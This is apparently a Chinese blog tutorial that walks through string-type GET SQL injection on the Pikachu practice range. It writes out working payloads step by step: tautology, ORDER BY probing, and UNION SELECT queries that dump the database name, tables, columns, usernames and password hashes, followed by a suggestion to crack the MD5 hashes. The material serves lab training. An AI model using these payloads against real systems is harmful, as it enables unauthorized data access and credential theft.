NCNIPC--皮卡丘web靶场SQL注入(字符型注入)

已于 2022-03-16 20:20:35 修改
阅读量5.1k 收藏 6
点赞数 2
分类专栏: NCNIPC 文章标签: 安全 php
于 2022-03-16 20:15:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xulei1132562/article/details/123535039
版权

我们打开我们的靶场,我们带着同学简单练习一个字符型注入(get),点击SQL-Inject,点击字符型注入(get),我们直接就测试一下输入1’如图所示。
输入1’测试sql注入
点击“查询”按钮后,回显出报错了,报错信息为“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1”
这个报错信息就是典型的可能存在sql注入的信息,然后我们输入永真式1’or 1=1 #然后点击“查询”按钮,因为永真式恒成立,所以我们得到了全部信息。
在这里插入图片描述
我们输入

1'order by 1#

探测有回显多少个行数,输入

1'order by 1#

发现回显正常,然后输入

1'order by 2#

发现回显正常,如图所示,输入

1'order by 3#

发现回显错误

Unknown column '3' in 'order clause'

那么就说明后端数据库传递过来的数据一共回显两行。
输入1'order by 2#发现回显正常
接下来我们就利用union进行联合查询注入,我们输入

1'union select 1,database()#

然后点击查询,会回显数据库名
在这里插入图片描述
根据回显的信息,我们得到数据库名为pikachu,然后我们可以继续探测一下数据库用户名,输入

1'union select 1,user()#

根据回显root@localhost得到数据库用户名为root。
我们已知数据库名,接下来我们想要拿到数据表名,我们输入

1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')#

如图所示。
在这里插入图片描述
我们已经知道了数据表名,那么我们接下来就是要查询数据表中的列名,比如我们关注users表,那么我们在输入框输入

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#

如图所示。
在这里插入图片描述
我们发现了我们比较关注的username与password,所以我们尝试拿到这两个的字段名,我们输入

1'union select (select group_concat(username) from users),(select group_concat(password) from users)#

如图所示。
在这里插入图片描述
拿到了password的密码的md5值(这个靶场是使用md5加密的),然后我们可以使用彩虹表破解,或者使用一些在线破解网站尝试破解,比如cmd5网站等,网址为https://www.cmd5.com,如图所示,我们sql的练习就先介绍到这里,还有很多其他类型的sql注入,大家可以自己尝试去做一下。
在这里插入图片描述

梅苑安全
关注
专栏目录
pikachu靶场 字符注入(sqlmap注入参数,针对GET方法)
wjwqp的专栏
03-02 2502
pikachu靶场 字符注入可以用BurpSuit进行操作,可以获取到所有用户,但是要获取数据库的表内容我们还是用SQLMAP进行。 SqlMap注入中,上次是采用POST表单的注入,这次我们讲解GET方法取表的内容。 参数返回:GET /pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 HTTP/1...
2022.7.28皮卡丘靶场SQL注入作业
weixin_44503202的博客
07-29 730
sqlmap注入
pikachu靶场字符注入(get)
ranioe的博客
12-08 3594
pikachu靶场字符注入(get) 字符注入 先找一个可以正确返回的内容 判断闭合条件 查询vince’报错 查询vince”没有报错 则说明是使用’闭合的。 把vince’构造可满足放回正确内容的语句 把vince’构造可满足放回正确内容的语句,在这个过程中可以利用and 1=1 和and 1=2 去判断是否构造成功 and 1=1 返回正常,and 1=2 查询不到用户。则说明构造成功了 查询字段数 查字段是否为2时,没有报错,查字段数是否为3时,报错。则说明字段数为2 查询回显位 语
pikachu闯关(二)---字符注入
最新发布
weixin_75034911的博客
07-05 756
首先我们要知道字符和数字的区别:当我们输入的是整数并且不需要使用引号闭合时,为数字,而字符是当我们输入的内容为字符串类字符和数字最大的一个区别在于,数字不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。所以字符注入是需要使用单引号进行闭合的,然后在后面接上我们的payload。
pikachu靶场——字符SQL注入
Mr_Liu___的博客
07-08 217
pikachu 字符SQL注入
m0_61903602的博客
10-25 657
pikachu 靶场 sql 字符
Pikachu靶场sql注入通关
oiadkt的博客
03-07 5220
pickchu—sql注入通关
皮卡丘靶场-sql注入详解
Mr_helloword的博客
07-31 1810
皮卡丘靶场-sql注入 数字注入 这里为post传参,所以我们需要抓包 抓包后发现id,我们一般在后面输入 ’ " \来测试有无注入,发现有sql语句报错,而且没有数字1,这和题目提示的数字注入一样 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200730155448929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNz
pikachu靶场sql注入
07-27
这些类包括数字注入字符注入、搜索注入、xx注入、insert/update注入、delete注入、http头注入、盲注(基于布尔值)和盲注(基于时间)以及宽字节注入等。你可以使用工具如sqlmap来进行注入测试,通过...
SQL注入字符注入(GET)
Ethan024的博客
03-22 554
SQL注入—数值注入(GET)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值注入(GET) 实验步骤: 当输入一个数据库里存在的用户名时候,会出现相关邮箱和id: 当输入一个不存在的字符串时,没有任何信息: 查看其URL,发现请求实在URL中提交的,是一个GET请求: http://localhost/pikaqiu.cn/vul/sqli/sqli_str.php?name=1111&submit=%E6%9F%A5%E8%AF%A2
SQL注入-Pikachu靶场通关_pikachu靶场通关sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 832
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
weixin_36352432的博客
12-23 351
靶场地址:封神台方法一、首先尝试手工找注入点判断第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车,页面返回正常构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车,页面正常构造 ?id=1 and 1=1 order by 2 回车,页面正常构造 ?id=1...
Pikachu靶场:SQL-Inject之字符注入(基于报错)
witwitwiter的博客
05-09 601
Pikachu靶场:SQL-Inject之字符注入(基于报错) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 技巧思路: 在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。 select/insert/update/delete都可以使用报错来获取信息。 背景条件: 后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端。 updatexml():函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractval
Pikachu靶场 字符SQL注入
感谢关注
12-22 491
在Pikachu靶场里查询。,输入下面的命令,再输入。
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5146
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
NCNIPC-靶场介绍&&Django SQL注入(CVE-2021-35042)
03-01 2335
NCNIPC-中国科学院研究生院国家计算机网络入侵防范中心 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息安全管理办公室(以下简称国信安办)的依靠力量,承担和协调国内各种黑客事件的防范处理,协助国信安办完成关键部分的应急处理任务,协助解决社会上的应急/救援组织难以解决的网络安全疑难问题,是国家计算机网络应急处理体系中心的重要部门。 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息
pikachu字符注入
m0_58887624的博客
11-09 1902
1.字符注入吧。直接就 1' 报错了 2.存在字符注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5819
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2735
pikachu靶场通关之sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅苑安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值